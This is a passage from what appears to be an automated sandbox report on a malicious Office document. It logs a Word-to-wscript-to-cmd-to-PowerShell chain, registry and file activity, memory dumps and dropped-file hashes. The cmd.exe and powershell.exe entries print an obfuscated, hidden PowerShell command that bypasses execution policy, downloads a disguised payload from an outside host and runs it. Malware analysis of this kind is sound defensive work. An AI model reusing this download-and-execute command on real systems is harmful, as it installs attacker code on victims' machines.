Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 2
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (78)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 71
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Process #43: cmd.exe
50 0
»
Information Value
ID #43
File Name c:\windows\system32\cmd.exe
Command Line "C:\Windows\System32\cmd.exe" /c WNjKdpGDFcPRHnV & Po^wEr^sh^elL.e^Xe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','%temp%xeE84.png'); & %temp%xeE84.png & VsDANZWTyXBdJcu
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:02:02, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:23
OS Process Information
»
Information Value
PID 0xc6c
Parent PID 0x71c (c:\windows\system32\wscript.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x C70
Host Behavior
File (7)
»
Operation Filename Additional Information Success Count Logfile
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 2
Fn
Open STD_OUTPUT_HANDLE - True 3
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Registry (17)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Command Processor - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 24, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor value_name = AutoRun, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DisableUNCCheck, data = 64, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DelayedExpansion, data = 1, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Command Processor value_name = AutoRun, data = 9, type = REG_NONE False 1
Fn
Module (8)
»
Operation Module Additional Information Success Count Logfile
Get Handle c:\windows\system32\cmd.exe base_address = 0x4ac50000 True 1
Fn
Get Handle c:\windows\system32\kernel32.dll base_address = 0x77040000 True 2
Fn
Get Filename - process_name = c:\windows\system32\cmd.exe, file_name_orig = C:\Windows\System32\cmd.exe, size = 260 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetThreadUILanguage, address_out = 0x77056d40 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = CopyFileExW, address_out = 0x770523d0 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = IsDebuggerPresent, address_out = 0x77048290 True 1
Fn
Get Address c:\windows\system32\kernel32.dll function = SetConsoleInputExeNameW, address_out = 0x770517e0 True 1
Fn
System (3)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-26 16:47:06 (UTC) True 1
Fn
Get Time type = Ticks, time = 193753 True 1
Fn
Get Time type = Performance Ctr, time = 24832027162 True 1
Fn
Environment (13)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 4
Fn
Data
Get Environment String name = PATH, result_out = C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft Office\root\Client True 1
Fn
Get Environment String name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC True 1
Fn
Get Environment String name = PROMPT False 1
Fn
Get Environment String name = COMSPEC, result_out = C:\Windows\system32\cmd.exe True 1
Fn
Get Environment String name = KEYS False 1
Fn
Get Environment String name = temp, result_out = C:\Users\aETAdzjz\AppData\Local\Temp True 2
Fn
Set Environment String name = PROMPT, value = $P$G True 1
Fn
Set Environment String name = =C:, value = C:\Users\aETAdzjz\Documents True 1
Fn
Process #44: powershell.exe
296 0
»
Information Value
ID #44
File Name c:\windows\system32\windowspowershell\v1.0\powershell.exe
Command Line PowErshelL.eXe -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://larixparcels.com/logo.png','C:\Users\aETAdzjz\AppData\Local\TempxeE84.png');
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:02:04, Reason: Child Process
Unmonitor End Time: 00:04:25, Reason: Terminated by Timeout
Monitor Duration 00:02:21
OS Process Information
»
Information Value
PID 0xce0
Parent PID 0xc6c (c:\windows\system32\cmd.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x CE4
0x CEC
0x CF0
0x CF4
0x CF8
0x CFC
0x D00
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
buffer 0x7FF0010A000 0x7FF0010AFFF First Execution - 64-bit 0x7FF0010A6A0, 0x7FF0010A080 False False
...
powershell.exe 0x13FF20000 0x13FF96FFF Relevant Image - 64-bit - False False
...
buffer 0x01F82000 0x01F83FFF First Execution - 64-bit 0x01F825EC False False
...
buffer 0x7FF0011D000 0x7FF0011DFFF First Execution - 64-bit 0x7FF0011D020 False False
...
buffer 0x7FF00042000 0x7FF00042FFF First Execution - 64-bit 0x7FF00042DB8 False False
...
buffer 0x7FF00043000 0x7FF00043FFF First Execution - 64-bit 0x7FF00043B38, 0x7FF000435D8, ... False False
...
buffer 0x7FF00145000 0x7FF00145FFF First Execution - 64-bit 0x7FF0014507D False False
...
buffer 0x7FF00143000 0x7FF00143FFF First Execution - 64-bit 0x7FF00143A20, 0x7FF00143A7D False False
...
buffer 0x7FF00146000 0x7FF00146FFF First Execution - 64-bit 0x7FF0014607D False False
...
buffer 0x7FF0004A000 0x7FF0004AFFF First Execution - 64-bit 0x7FF0004A088 False False
...
buffer 0x7FF0011E000 0x7FF0011EFFF First Execution - 64-bit 0x7FF0011E820 False False
...
buffer 0x7FF00280000 0x7FF00280FFF First Execution - 64-bit 0x7FF00280130 False False
...
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
c:\users\aetadzjz\appdata\roaming\microsoft\windows\recent\customdestinations\0ulni9hnju5klneyfyon.temp 7.85 KB MD5: 8e98b6fe6ff745120849ecbd93d92ca0
SHA1: 7e5f6163318c2a6f9149c5f334675105871e0e07
SHA256: 0a5a2e32a0afb3bf761c84c0c68eb21a2148fc651a8170ba83f61b146009a77e
SSDeep: 96:WluC6MqYqvsqvJCwom0S0iluC6MqYqvsEHyqvJCworc0S0FnJ0H30F0nYQlUVQ09:0sBom0S0gsZHnorc0S0F40F0nYk0M0D 		False
...
Host Behavior
File (61)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml type = file_attributes True 1
Fn
Get Info C:\Users\aETAdzjz type = file_attributes True 5
Fn
Get Info C:\ type = file_attributes True 6
Fn
Get Info C:\Users\aETAdzjz\Documents type = file_attributes True 7
Fn
Get Info C:\Users type = file_attributes True 4
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 2530 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 542, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 4096 True 6
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 2762 True 1
Fn
Data
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 310, size_out = 0 True 1
Fn
Read C:\Windows\System32\WindowsPowerShell\v1.0\Certificate.format.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (88)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security - False 2
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts - True 1
Fn
Open Key Media Center - True 1
Fn
Open Key Media Center\PowerShell - False 1
Fn
Open Key OAlerts - True 1
Fn
Open Key OAlerts\PowerShell - False 1
Fn
Open Key Security - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Read Value - value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value - value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (10)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 9
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (63)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 57
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Set Environment String name = PSExecutionPolicyPreference, value = Bypass True 1
Fn
Process #45: wscript.exe
176 0
»
Information Value
ID #45
File Name c:\windows\system32\wscript.exe
Command Line "C:\Windows\System32\WScript.exe" "C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js"
Initial Working Directory C:\Users\aETAdzjz\Documents\
Monitor Start Time: 00:02:21, Reason: Child Process
Unmonitor End Time: 00:02:28, Reason: Self Terminated
Monitor Duration 00:00:06
OS Process Information
»
Information Value
PID 0xd50
Parent PID 0x910 (c:\program files\microsoft office\root\office16\winword.exe)
Bitness 64-bit
Is Created or Modified Executable False
Integrity Level Medium
Username YKYD69Q\aETAdzjz
Enabled Privileges SeChangeNotifyPrivilege
Thread IDs
0x D54
0x D64
0x D68
0x D6C
0x D70
0x D74
0x D78
0x D7C
0x D80
0x D84
Host Behavior
COM (6)
»
Operation Class Interface Additional Information Success Count Logfile
Create F414C260-6AC0-11CF-B6D1-00AA00BBBB58 00000000-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER, CLSCTX_INPROC_HANDLER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER False 1
Fn
Create 00000323-0000-0000-C000-000000000046 00000146-0000-0000-C000-000000000046 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 6C736DB1-BD94-11D0-8A23-00AA00B58E10 6C736DC1-AB0D-11D0-A2AD-00A0C90F27E8 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create 06290BD1-48AA-11D2-8432-006008C3FBFC E4D1C9B0-46E8-11D4-A2A6-00104BD35090 cls_context = CLSCTX_INPROC_SERVER True 1
Fn
Create WScript.Shell IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
Create shell.applicatiOn IClassFactory cls_context = CLSCTX_INPROC_SERVER, CLSCTX_LOCAL_SERVER, CLSCTX_REMOTE_SERVER True 1
Fn
File (4)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js desired_access = GENERIC_READ, file_attributes = FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Get Info C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js type = size True 1
Fn
Read C:\Users\aETAdzjz\AppData\Local\Temp\LDR_2886.js size = 19304, size_out = 19304 True 1
Fn
Data
Registry (30)
»
Operation Key Additional Information Success Count Logfile
Create Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Create Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings - True 1
Fn
Open Key HKEY_CLASSES_ROOT\.js - True 1
Fn
Open Key HKEY_CLASSES_ROOT\JSFile\ScriptEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Script\Features - False 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\COM3 - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = Enabled, data = 103, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = IgnoreUserSettings, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_CURRENT_USER\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Script Host\Settings value_name = LogSecuritySuccesses, data = 0, type = REG_NONE False 1
Fn
